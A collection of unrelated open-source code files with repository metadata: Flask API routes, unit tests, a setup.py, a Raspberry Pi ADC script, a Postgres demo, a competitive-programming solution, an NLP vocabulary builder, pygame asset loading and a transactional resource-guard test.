+{"seq_id":"71356373034","text":"import json\n\nfrom flask import Blueprint, request\n\nfrom utils.db import get_db_connection\nfrom utils.message import send_message\n\ndata_cleaning = Blueprint(\"data-cleaning\", __name__)\n\n\n@data_cleaning.route(\"/\", methods=[\"POST\"])\ndef index():\n data = request.data\n\n try:\n job = str(json.loads(data)[\"job-id\"])\n except:\n return \"Invalid JSON\", 400\n\n try:\n db = get_db_connection()\n except:\n return \"Internal server error\", 500\n\n collection = db[\"Diastema\"][\"DataCleaning\"]\n match = collection.find_one({\"job-id\": job})\n\n if match:\n db.close()\n return \"Job ID already exists\", 400\n\n collection.insert_one({ \"job-id\": job, \"status\": \"progress\", \"result\": \"\" })\n db.close()\n\n try:\n send_message(\"data-cleaning\", data)\n except:\n return \"Failed to submit Data Cleaning job\", 500\n\n return \"Data Cleaning job submitted\", 200\n\n\n@data_cleaning.route(\"/progress\", methods=[\"GET\"])\ndef data_cleaning_progress():\n job = request.args.get(\"id\")\n\n if not job:\n return \"Missing ID argument\", 400\n\n try:\n db = get_db_connection()\n except:\n return \"Internal server 
error\", 500\n\n collection = db[\"Diastema\"][\"DataCleaning\"]\n match = collection.find_one({\"job-id\": job})\n db.close()\n\n if not match:\n return \"Job ID doesn't exist\", 404\n\n return match[\"status\"], 200\n\n\n@data_cleaning.route(\"/\", methods=[\"GET\"])\ndef data_cleaning_job(job):\n try:\n db = get_db_connection()\n except:\n return \"Internal server error\", 500\n\n collection = db[\"Diastema\"][\"DataCleaning\"]\n match = collection.find_one({\"job-id\": job})\n\n if not match:\n return \"Job ID doesn't exist\", 404\n\n return match[\"result\"], 200\n","repo_name":"konvoulgaris/diastema","sub_path":"daas-api/src/routes/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"11466495349","text":"__author__ = 'vcaen'\nfrom lyontour import api, app\nfrom flask.ext.restful import Resource\nfrom lyontour.model.tour_manager import Tour\nfrom lyontour.model.filter_manager import filter_manager\nfrom flask import Flask, request\n\n\ntodos = {}\n\n\n@app.route('/tour', methods=['POST', 'GET'])\ndef Test():\n if(request.method == 'POST'):\n\n return (Tour(request.form['datedebut'], request.form['datefin'], list)).toString()\n else:\n filtres = request.args.get('filtre')\n if filtres is None:\n list = {}\n else:\n list = str(request.args.get('filtre')).split(',')\n return (Tour(request.args.get('datedebut'),request.args.get('datefin'), list)).toString()\n\n# @app.route('/')\n# def Test():\n# tour = Tour('2015-06-04','2015-06-10')\n# liste_jours = tour.getJours()\n# filtre_user = ['shops', 'arts']\n# filtre_manager = filter_manager()\n# attractions = filtre_manager.getAttractionFiltred(liste_jours, filtre_user)\n# print(\"Hello World\")\n# print ('%s',str(attractions))\n# return (str(attractions))\n","repo_name":"vcaen/lyon-tour","sub_path":"src/lyontour/views/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31293823608","text":"import unittest\nfrom meta_class import CustomMeta\n\n\nclass CustomClass(metaclass=CustomMeta):\n x = 50\n\n def __init__(self, val=99):\n self.val = val\n\n def line(self):\n return 100\n\n def __str__(self):\n return \"Custom_by_metaclass\"\n\n\nclass TestMetaClass(unittest.TestCase):\n\n def setUp(self):\n self.ob = CustomClass()\n print('Set up')\n\n def tearDown(self):\n print('Tear down')\n\n def test_class_attrs(self):\n self.assertEqual(CustomClass.custom_x, 50)\n CustomClass.custom_line\n CustomClass.__init__\n with self.assertRaises(Exception):\n CustomClass.new_attr\n CustomClass.custom_new_attr\n CustomClass.new_attr = 0\n self.assertEqual(CustomClass.custom_new_attr, 0)\n CustomClass.new_attr = 5\n self.assertEqual(CustomClass.custom_new_attr, 5)\n CustomClass.custom_new_attr = 0\n self.assertEqual(CustomClass.custom_new_attr, 0)\n CustomClass.custom_new_attr\n\n CustomClass.__attr = 'string'\n with self.assertRaises(Exception):\n CustomClass.__attr\n self.assertEqual(CustomClass.custom__TestMetaClass__attr, 'string')\n\n self.assertEqual(CustomClass.custom_line(self.ob), 100)\n\n def test_ob_attrs(self):\n self.assertEqual(self.ob.custom_x, 50)\n self.assertEqual(self.ob.custom_val, 99)\n self.ob.custom_line\n self.assertEqual(self.ob.custom_line(), 100)\n self.ob.__init__\n with self.assertRaises(Exception):\n self.ob.new_attr\n self.ob.custom_new_attr\n 
self.ob.new_attr = 0\n self.assertEqual(self.ob.custom_new_attr, 0)\n self.ob.new_attr = 5\n self.assertEqual(self.ob.custom_new_attr, 5)\n self.ob.custom_new_attr = 0\n self.assertEqual(self.ob.custom_new_attr, 0)\n self.ob.custom_new_attr\n\n self.ob._attr = {'string': 120}\n with self.assertRaises(Exception):\n self.ob.__attr\n self.assertEqual(self.ob.custom__attr, {'string': 120})\n\n self.ob.__attr = 'string'\n with self.assertRaises(Exception):\n self.ob.__attr\n self.assertEqual(self.ob.custom__TestMetaClass__attr, 'string')\n\n self.assertEqual(self.ob.custom_line(), 100)\n self.assertEqual(str(self.ob), 'Custom_by_metaclass')\n","repo_name":"DSFed8889/msu_deep_python_spring_2022","sub_path":"04/test_meta_class.py","file_name":"test_meta_class.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41861558642","text":"import os\nfrom setuptools import setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\nread_file = lambda filename: open(os.path.join(here, filename)).read()\nread_requirements = lambda filename: read_file(filename).splitlines()\n\n# Stops exit traceback on tests\ntry:\n import multiprocessing\nexcept:\n pass\n\ntest_requirements = [\n 'nose'\n]\n\nsetup(\n name='Flask-MongoRest',\n version='0.1.1',\n url='http://github.com/elasticsales/flask-mongorest',\n license='BSD',\n author='Anthony Nemitz',\n author_email='anemitz@gmail.com',\n maintainer='Anthony Nemitz',\n maintainer_email='anemitz@gmail.com',\n description='Flask restful API framework for MongoDB/MongoEngine',\n long_description=read_file('README.md'),\n packages=[\n 'flask_mongorest',\n ],\n package_data={\n 'flask_mongorest': ['templates/mongorest/*']\n },\n test_suite='nose.collector',\n zip_safe=False,\n platforms='any',\n install_requires=read_requirements('requirements.txt'),\n tests_require=test_requirements,\n extras_require={'test': test_requirements},\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","repo_name":"wuurrd/flask-mongorest","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"39594765485","text":"import RPi.GPIO as GPIO\nimport time\ndac = [26,19,13,6,5,11,9,10]\ncomp = 4\ntroyka = 17\nmaxVoltage = 3.3\nlevels = 256\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(dac,GPIO.OUT)\nGPIO.setup(troyka,GPIO.OUT,initial=GPIO.HIGH)\nGPIO.setup(comp,GPIO.IN)\ndef decimal2binary(value):\n return [int(bit) for bit in bin(value)[2:].zfill(8)]\ndef num2dac(value):\n signal = decimal2binary(value)\n GPIO.output(dac,signal)\n return signal\ndef adc():\n for value in range(256):\n time.sleep(0.005)\n signal =num2dac(value)\n voltage = value/levels*maxVoltage\n time.sleep(0.0001)\n comparatorValue = GPIO.input(comp)\n if (comparatorValue == 0):\n return voltage\n break\ntry:\n while(True):\n print(adc())\nfinally:\n GPIO.output(dac,0)\n #GPIO.output(dac,0)\n GPIO.cleanup()","repo_name":"FastBery/rpi","sub_path":"5 
lesson/5-1-adc-simple.py","file_name":"5-1-adc-simple.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"34053241743","text":"import psycopg2\n\nconnection = psycopg2.connect('user=postgres dbname=example')\ncur = connection.cursor()\n\ncur.execute('DROP TABLE IF EXISTS table2')\ncur.execute('''\n CREATE TABLE table2(\n id INTEGER PRIMARY KEY,\n completed BOOLEAN NOT NULL DEFAULT FALSE\n );''')\n\nsql = 'INSERT INTO table2(id , completed) values (%(id)s,%(completed)s);'\ndata = {'id':5,'completed':True}\n\ncur.execute(sql,data)\n\ncur.execute('SELECT * FROM table2')\nprint(cur.fetchall())\n\n\nconnection.commit()\nconnection.close()\ncur.close()","repo_name":"Paras2soori/flaskdemo","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"70539074793","text":"# Problem: https://www.acmicpc.net/problem/1106\n\nimport sys\n\ninput = sys.stdin.readline\nINF = 1e9\n\nc, n = map(int, input().split())\ndata = []\n\nmin_cost = [INF] * (c+100)\nmin_cost[0] = 0\n\nfor _ in range(n):\n # cost, cus\n data.append(list(map(int, input().split())))\n\n# sort the entries by cost in ascending order\ndata_sort = sorted(data, key = lambda x: x[0])\n\n\nfor cost, cus in data_sort:\n for i in range(cus, c+100):\n min_cost[i] = min(min_cost[i-cus] + cost, min_cost[i])\n\nprint(min(min_cost[c:]))","repo_name":"fbghgus123/algorithm","sub_path":"python/백준/DP/1106_호텔.py","file_name":"1106_호텔.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"943331014","text":"__version__ = '1.0.0-rc.1'\n__author__ = 'Lorenzo Menghini, Martino Pulici, Alessandro Stockman, Luca Zucchini'\n\n\nimport collections\nimport os\n\nimport torchtext\nfrom tqdm import tqdm\n\n\ndef build_vocabulary(df, cols, tokenizer, min_freq=1, save_path=None):\n \"\"\"\n Builds vocabulary.\n\n Parameters\n ----------\n df : pandas.core.frame.DataFrame\n Dataset.\n cols : list\n List of columns.\n tokenizer : transformers.models.bert.tokenization_bert.BasicTokenizer\n Tokenizer.\n min_freq : int, default 1\n Minimum frequency to become part of the vocabulary.\n save_path : str, optional\n Saving path of the vocabulary.\n\n Returns\n -------\n v : torchtext.vocab.Vocab\n Vocabulary.\n tokenizer : transformers.models.bert.tokenization_bert.BasicTokenizer\n Tokenizer.\n\n \"\"\"\n counter = collections.Counter()\n for token in tokenizer.special_tokens_map.values():\n counter[token] = min_freq + 1\n sentences_in_cols = [v for col in cols for v in df[col].values]\n num_sentences = len(sentences_in_cols)\n print(f'Comments count: {num_sentences}')\n print(f'Creating vocabulary from comments...')\n percentage_printed = 0.0\n for index, sentence in enumerate(sentences_in_cols):\n percentage = round(index / num_sentences, 2)\n if percentage == 0.25 and percentage_printed == 0.0:\n print(f'25% vocabulary created')\n percentage_printed = 0.25\n elif percentage == 0.50 and percentage_printed == 0.25:\n print(f'50% vocabulary created')\n percentage_printed = 0.50\n elif percentage == 0.75 and percentage_printed == 0.5:\n print(f'75% vocabulary created')\n percentage_printed = 0.75\n counter.update(tokenizer._tokenize(sentence))\n v = torchtext.vocab.vocab(counter, min_freq=min_freq).get_stoi()\n print(f'Vocabulary created ({len(v)} words)')\n if save_path:\n 
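# persist the finished vocabulary to disk so later runs can reload it instead of rebuilding\n 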
save_vocabulary(save_path, v)\n return v, tokenizer\n\n\ndef get_preprocess_filenames(pipelines, vocab_file, dataset_file=None):\n \"\"\"\n Gets the appropriate vocabulary file path to load.\n\n Parameters\n ----------\n pipelines : list\n List of preprocessing pipelines.\n vocab_file : str\n Path of vocabulary file.\n dataset_file : str, optional\n Path of dataset file.\n\n Returns\n -------\n vocab_to_load : str\n Path of vocabulary file to load.\n dataset_to_load : str, optional\n Path of dataset to load.\n\n \"\"\"\n pipelines.sort()\n if pipelines is None or len(pipelines) == 0:\n return None\n dataset_to_load = dataset_file[:-4] if dataset_file else ''\n vocab_to_load = vocab_file[:-4]\n for pipeline in pipelines:\n dataset_to_load += '_' + pipeline\n vocab_to_load += '_' + pipeline\n dataset_to_load += '.csv'\n vocab_to_load += '.txt'\n if dataset_file:\n return vocab_to_load, dataset_to_load\n else:\n return vocab_to_load\n\n\ndef load_vocabulary(vocab_file):\n \"\"\"\n Loads a vocabulary file into a dictionary.\n\n Parameters\n ----------\n vocab_file : str\n Path of vocabulary file.\n\n Returns\n -------\n vocab : torchtext.vocab.Vocab\n Vocabulary.\n\n \"\"\"\n vocab_dict = collections.OrderedDict()\n print(f'Loading vocabulary from {vocab_file}')\n if not os.path.isfile(vocab_file):\n print(f'Vocabulary file not found')\n open(vocab_file, 'a+').close()\n with open(vocab_file, 'r', encoding='utf-8') as reader:\n tokens = reader.readlines()\n for index, token in tqdm(enumerate(tokens), total=len(tokens)):\n token = token.rstrip('\\n')\n vocab_dict[token] = index + 1\n vocab = torchtext.vocab.vocab(vocab_dict, min_freq=1).get_stoi()\n print(f'Loaded vocabulary')\n return vocab\n\n\ndef save_vocabulary(save_path, vocab):\n \"\"\"\n Save the vocabulary to a given file path.\n\n Parameters\n ----------\n save_path : str\n Saving path of the vocabulary.\n vocab : torchtext.vocab.Vocab\n Vocabulary.\n\n \"\"\"\n index = 0\n print(f'Saving vocabulary to path: {save_path}')\n with open(save_path, 'w', encoding='utf-8') as writer:\n for token, token_index in sorted(vocab.items(), key=lambda kv: kv[1]):\n if index != token_index:\n print(\n f'Saving vocabulary to {save_path}: vocabulary indices are not consecutive.'\n ' Please check that the vocabulary is not corrupted!')\n index = token_index\n writer.write(token + '\\n')\n index += 1\n","repo_name":"ilSommo/rate-severity-of-toxic-comments","sub_path":"rate_severity_of_toxic_comments/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41384126588","text":"# -*- coding: utf-8 -*-\n\nimport sxtools\n\n\nTO_DO = {\n 'carro': 'carros',\n 'moto': 'motos',\n 'caminhao': 'caminhoes',\n 'caminhão': 'caminhões',\n 'nautico': 'nauticos',\n 'CAMINHÃO': 'CAMINHÕES',\n 'Legal': 'Legais',\n 'LEGAL': 'LEGAIS'\n}\n\n\ndef test_pluralize_items():\n for to in TO_DO:\n assert sxtools.pluralize(to) == TO_DO[to]\n","repo_name":"sxslex/sxtools","sub_path":"tests/test_pluralize.py","file_name":"test_pluralize.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"pt","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"2725221988","text":"import pygame\nimport os\n\nWIDTH = 1920\nHEIGHT = 1080\nSIZESETKAX = 108\nSIZESETKAY = 192\nMUSIC_VOLUME = 0\nCONVEER_SIZE = 32\n\npygame.init()\npygame.mixer.init()\npygame.display.set_caption(\"mini Factory\")\nscreen = 
pygame.display.set_mode((WIDTH, HEIGHT))\n\nmain_folder = os.path.dirname(__file__)\n\nfon_image = pygame.image.load(os.path.join(main_folder, \"images/Fon.jpg\")).convert_alpha()\nbtn_settings_img = pygame.image.load(os.path.join(main_folder, \"images/Settings.png\")).convert_alpha()\nbtn_start_img = pygame.image.load(os.path.join(main_folder, \"images/Start.png\")).convert_alpha()\nbtn_sound_off_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/soundOFF.png\")).convert_alpha()\nbtn_sound_minus_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/sound_minus.png\")).convert_alpha()\nbtn_sound_plus_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/sound_plus.png\")).convert_alpha()\nbtn_back_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/back.png\")).convert_alpha()\nbtn_yes_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/yes.png\")).convert_alpha()\nbtn_no_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/no.png\")).convert_alpha()\nbtn_quit_img = pygame.image.load(os.path.join(main_folder, \"images/quit.png\")).convert_alpha()\nnumber_0_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/0.png\")).convert_alpha()\nnumber_10_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/10.png\")).convert_alpha()\nnumber_20_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/20.png\")).convert_alpha()\nnumber_30_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/30.png\")).convert_alpha()\nnumber_40_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/40.png\")).convert_alpha()\nnumber_50_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/50.png\")).convert_alpha()\nnumber_60_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/60.png\")).convert_alpha()\nnumber_70_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/70.png\")).convert_alpha()\nnumber_80_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/80.png\")).convert_alpha()\nnumber_90_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/90.png\")).convert_alpha()\nnumber_100_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/100.png\")).convert_alpha()\nfon_game_img = pygame.image.load(os.path.join(main_folder, \"images/fon_game.jpeg\")).convert_alpha()\nhud_up_img = pygame.image.load(os.path.join(main_folder, \"images/hud/hud_up1.png\")).convert_alpha()\nhud_down_img = pygame.image.load(os.path.join(main_folder, \"images/hud/hud_down1.png\")).convert_alpha()\nzhila_med_img = pygame.image.load(os.path.join(main_folder, \"images/med.png\")).convert_alpha()\nzhila_iron_img = pygame.image.load(os.path.join(main_folder, \"images/iron.png\")).convert_alpha()\nzhila_isvestnyak_img = pygame.image.load(os.path.join(main_folder, \"images/isvestnyak.png\")).convert_alpha()\nikonka_beton_img = pygame.image.load(os.path.join(main_folder, \"images/resources/beton.png\")).convert_alpha()\nikonka_iron_img = pygame.image.load(os.path.join(main_folder, \"images/resources/iron.png\")).convert_alpha()\nikonka_isvestnyak_img = pygame.image.load(os.path.join(main_folder, \"images/resources/isvestnyak.png\")).convert_alpha()\nikonka_kabel_img = pygame.image.load(os.path.join(main_folder, \"images/resources/kabel.png\")).convert_alpha()\nikonka_karkas_img = pygame.image.load(os.path.join(main_folder, \"images/resources/karkas.png\")).convert_alpha()\nikonka_motor_img = 
pygame.image.load(os.path.join(main_folder, \"images/resources/motor.png\")).convert_alpha()\nikonka_plastina_img = pygame.image.load(os.path.join(main_folder, \"images/resources/plastina.png\")).convert_alpha()\nikonka_provolka_img = pygame.image.load(os.path.join(main_folder, \"images/resources/provolka.png\")).convert_alpha()\nikonka_prut_img = pygame.image.load(os.path.join(main_folder, \"images/resources/prut.png\")).convert_alpha()\nikonka_rotor_img = pygame.image.load(os.path.join(main_folder, \"images/resources/rotor.png\")).convert_alpha()\nikonka_startor_img = pygame.image.load(os.path.join(main_folder, \"images/resources/startor.png\")).convert_alpha()\nikonka_ukr_plastina_img = pygame.image.load(os.path.join(main_folder, \"images/resources/ukr_plastina.png\")).convert_alpha()\nikonka_vint_img = pygame.image.load(os.path.join(main_folder, \"images/resources/vint.png\")).convert_alpha()\nikonka_ymnaya_obshivka_img = pygame.image.load(os.path.join(main_folder, \"images/resources/ymnaya_obshivka.png\")).convert_alpha()\nikonka_med_img = pygame.image.load(os.path.join(main_folder, \"images/resources/med.png\")).convert_alpha()\nhud_next_img = pygame.image.load(os.path.join(main_folder, \"images/hud/next.png\")).convert_alpha()\nhud_previos_img = pygame.image.load(os.path.join(main_folder, \"images/hud/previos.png\")).convert_alpha()\nnumber_0__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/0_.png\")).convert_alpha()\nnumber_1__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/1.png\")).convert_alpha()\nikonka_asembler_image = pygame.image.load(os.path.join(main_folder, \"images/asembler_1.png\")).convert_alpha()\nikonka_bur_image = pygame.image.load(os.path.join(main_folder, \"images/bur_1.png\")).convert_alpha()\nikonka_constructor_image = pygame.image.load(os.path.join(main_folder, \"images/constructor_1.png\")).convert_alpha()\nikonka_soedenitel_image = pygame.image.load(os.path.join(main_folder, \"images/soedenitel.png\")).convert_alpha()\nikonka_razvetlitel_image = pygame.image.load(os.path.join(main_folder, \"images/razvetlitel.png\")).convert_alpha()\nnumber__1__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/1_.png\")).convert_alpha()\nnumber__2__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/2_.png\")).convert_alpha()\nnumber__3__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/3_.png\")).convert_alpha()\nnumber__4__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/4_.png\")).convert_alpha()\nnumber__5__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/5_.png\")).convert_alpha()\nnumber__6__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/6_.png\")).convert_alpha()\nnumber__7__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/7_.png\")).convert_alpha()\nnumber__8__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/8_.png\")).convert_alpha()\nnumber__9__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/9_.png\")).convert_alpha()\nhud_postroika_right_img = pygame.image.load(os.path.join(main_folder, \"images/hud/right_postroika_hud.png\")).convert_alpha()\nhud_postroika_left_img = pygame.image.load(os.path.join(main_folder, \"images/hud/left_postroika_hud.png\")).convert_alpha()\n\nikonka_text_rescurces_beton_image = pygame.image.load(os.path.join(main_folder, \"images/names/beton.png\")).convert_alpha()\nikonka_text_rescurces_iron_image = pygame.image.load(os.path.join(main_folder, 
\"images/names/iron.png\")).convert_alpha()\nikonka_text_rescurces_isvestnyak_image = pygame.image.load(os.path.join(main_folder, \"images/names/isvestnyak.png\")).convert_alpha()\nikonka_text_rescurces_kabel_image = pygame.image.load(os.path.join(main_folder, \"images/names/kabel.png\")).convert_alpha()\nikonka_text_rescurces_karkas_image = pygame.image.load(os.path.join(main_folder, \"images/names/karkas.png\")).convert_alpha()\nikonka_text_rescurces_med_image = pygame.image.load(os.path.join(main_folder, \"images/names/med.png\")).convert_alpha()\nikonka_text_rescurces_motor_image = pygame.image.load(os.path.join(main_folder, \"images/names/motor.png\")).convert_alpha()\nikonka_text_rescurces_plastina_image = pygame.image.load(os.path.join(main_folder, \"images/names/plastina.png\")).convert_alpha()\nikonka_text_rescurces_provolka_image = pygame.image.load(os.path.join(main_folder, \"images/names/provolka.png\")).convert_alpha()\nikonka_text_rescurces_prut_image = pygame.image.load(os.path.join(main_folder, \"images/names/prut.png\")).convert_alpha()\nikonka_text_rescurces_rotor_image = pygame.image.load(os.path.join(main_folder, \"images/names/rotor.png\")).convert_alpha()\nikonka_text_rescurces_startor_image = pygame.image.load(os.path.join(main_folder, \"images/names/startor.png\")).convert_alpha()\nikonka_text_rescurces_ukr_plastina_image = pygame.image.load(os.path.join(main_folder, \"images/names/ukr_plastina.png\")).convert_alpha()\nikonka_text_rescurces_vint_image = pygame.image.load(os.path.join(main_folder, \"images/names/vint.png\")).convert_alpha()\nikonka_text_rescurces_ymnaya_obshivka_image = pygame.image.load(\n os.path.join(main_folder, \"images/names/ymnaya_obshivka.png\")).convert_alpha()\nikonka_text_postroyka_asembler_image = pygame.image.load(os.path.join(main_folder, \"images/names/asembler.png\")).convert_alpha()\nikonka_text_postroyka_bur_image = pygame.image.load(os.path.join(main_folder, \"images/names/bur.png\")).convert_alpha()\nikonka_text_postroyka_konstruktor_image = pygame.image.load(os.path.join(main_folder, \"images/names/konstruktor.png\")).convert_alpha()\nikonka_text_postroyka_yashik_image = pygame.image.load(os.path.join(main_folder, \"images/names/yashik.png\")).convert_alpha()\nimg_no_stroit = pygame.image.load(os.path.join(main_folder, \"images/ne_stroit.png\")).convert_alpha()\nimg_close = pygame.image.load(os.path.join(main_folder, \"images/hud/close.png\")).convert_alpha()\nimg_left = pygame.image.load(os.path.join(main_folder, \"images/hud/left.png\")).convert_alpha()\nimg_top = pygame.image.load(os.path.join(main_folder, \"images/hud/top.png\")).convert_alpha()\nimg_right = pygame.image.load(os.path.join(main_folder, \"images/hud/right.png\")).convert_alpha()\nimg_conveer_straight = pygame.image.load(os.path.join(main_folder, \"images/new_conveer_1.png\")).convert_alpha()\nimg_conveer_corner = pygame.image.load(os.path.join(main_folder, \"images/conveer_2.png\")).convert_alpha()\n\nimg_blue_window = pygame.image.load(os.path.join(main_folder, \"images/for_setka/blue_window.png\")).convert_alpha()\nimg_green_window = pygame.image.load(os.path.join(main_folder, \"images/for_setka/green_window.png\")).convert_alpha()\nimg_purple_window = pygame.image.load(os.path.join(main_folder, \"images/for_setka/purple_window.png\")).convert_alpha()\nimg_red_window = pygame.image.load(os.path.join(main_folder, \"images/for_setka/red_window.png\")).convert_alpha()\nvedelenie_img = pygame.image.load(os.path.join(main_folder, 
\"images/hud/vedelen.png\")).convert_alpha()\ndell_img = pygame.image.load(os.path.join(main_folder, \"images/hud/dell.png\"))\nconveer_1_template_img = pygame.image.load(os.path.join(main_folder, \"images/new_conveer_1_template.png\"))\nconveer_2_template_img = pygame.image.load(os.path.join(main_folder, \"images/conveer_2_template.png\"))\n\n# зелёный пустота\n# фиолетовый жилы\n# синий бур\n# красный все остальные постройки\nspisok_windows_image = [img_green_window, img_purple_window, img_blue_window, img_red_window]\n\nspisok_zhil_image = [zhila_iron_img, zhila_isvestnyak_img, zhila_med_img]\n\nspisok_postroiki_image = [ikonka_asembler_image, ikonka_bur_image, ikonka_constructor_image, ikonka_razvetlitel_image,\n ikonka_soedenitel_image]\n\nspisok_strelki_img = [img_left, img_top, img_right]\n\n\"\"\"\n0 0 1 0 - выход справо\n1 0 0 0 - выход слева\n0 1 0 0 - выход cнизу\n0 0 0 1 - выход сверху\n\"\"\"\nspisok_postroiki_outputs_diraction = [[0, 0, 1, 0], [1, 0, 0, 0], [1, 0, 0, 0], [1, 0, 1, 1], [0, 0, 0, 1]]\n\n\"\"\"\nassembler - два слева\nminer - отсутствуют входные порты\nconstructor - один справа\nsplitter - один снизу\nconnector - подному слева, снизу, справа\nпротив часовой стрелки\n\"\"\"\nspisok_postroiki_input_ports = [\n [[(-80,-25), (-80,17)], [(25,80), (-17,80)], [(80,-17), (80,25)], [(-25,-80), (17,-80)]],\n None,\n [[(32, 0)], [(0, -32)], [(-32, 0)], [(32, 0)]],\n [[(0, 32)], [(32, 0)], [(0, -32)], [(-32, 0)]],\n [[(0,0), (0,0), (0,0)], [(0,0), (0,0), (0,0)], [(0,0), (0,0), (0,0)], [(0,0), (0,0), (0,0)]]\n ]\n\n\n\nspisok_rescurces_img = [ikonka_beton_img, ikonka_iron_img, ikonka_isvestnyak_img, ikonka_kabel_img,\n ikonka_karkas_img,\n ikonka_med_img, ikonka_motor_img, ikonka_plastina_img, ikonka_provolka_img,\n ikonka_prut_img,\n ikonka_rotor_img, ikonka_startor_img, ikonka_ukr_plastina_img, ikonka_vint_img,\n ikonka_ymnaya_obshivka_img]\n\nnames_rescurces = [ikonka_text_rescurces_beton_image, ikonka_text_rescurces_iron_image,\n ikonka_text_rescurces_isvestnyak_image, ikonka_text_rescurces_kabel_image,\n ikonka_text_rescurces_karkas_image,\n ikonka_text_rescurces_med_image, ikonka_text_rescurces_motor_image,\n ikonka_text_rescurces_plastina_image, ikonka_text_rescurces_provolka_image,\n ikonka_text_rescurces_prut_image,\n ikonka_text_rescurces_rotor_image, ikonka_text_rescurces_startor_image,\n ikonka_text_rescurces_ukr_plastina_image, ikonka_text_rescurces_vint_image,\n ikonka_text_rescurces_ymnaya_obshivka_image, ikonka_text_postroyka_asembler_image,\n ikonka_text_postroyka_bur_image, ikonka_text_postroyka_konstruktor_image,\n ikonka_text_postroyka_yashik_image,\n ikonka_text_postroyka_yashik_image]\n\nnumbers_image_for_sound = [number_0_img, number_10_img, number_20_img, number_30_img, number_40_img, number_50_img,\n number_60_img, number_70_img, number_80_img, number_90_img, number_100_img]\n\nnumbers_image = [number_0__img, number__1__img, number__2__img, number__3__img, number__4__img, number__5__img,\n number__6__img, number__7__img, number__8__img, number__9__img]\n\nfon_music = os.path.join(main_folder, 'sounds\\\\oil_rig_ambience_01.mp3')\n","repo_name":"borik2008/minifactory","sub_path":"resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":14321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38597859646","text":"\"\"\"\nTest the `transactional_guard` decorator in terms of creating the transaction\nbefore checking the policies and calling rollback if policy is 
broken.\n\"\"\"\nfrom resource.resource_test_helper import UserModel, create_resource_test_data, users\nfrom unittest import TestCase\nimport unittest.mock as mock\n\nfrom mocks import mock_db_session\n\nfrom zsl import Zsl\nfrom zsl.application.containers.web_container import WebContainer\nfrom zsl.application.modules.alchemy_module import TransactionHolder\nfrom zsl.resource.guard import Access, GuardedMixin, ResourcePolicy, transactional_guard\nfrom zsl.resource.model_resource import ModelResource\nfrom zsl.testing.db import IN_MEMORY_DB_SETTINGS, DbTestCase\n\n\nclass UserResource(ModelResource):\n __model__ = UserModel\n\n\nclass TransactionalGuardTest(TestCase):\n def setUp(self):\n zsl = Zsl(__name__, config_object=IN_MEMORY_DB_SETTINGS,\n modules=WebContainer.modules())\n zsl.testing = True\n\n create_resource_test_data()\n super().setUp()\n\n def testIsInTransaction(self):\n test_case = self\n\n class AllowPolicy(ResourcePolicy):\n default = Access.ALLOW\n\n @transactional_guard([AllowPolicy()])\n class GuardedUserModel(UserResource, GuardedMixin):\n def secure_read(self, *args, **kwargs):\n test_case.assertIsNotNone(self._orm)\n test_case.assertTrue(self._in_transaction)\n\n return super().read(*args, **kwargs)\n\n resource = 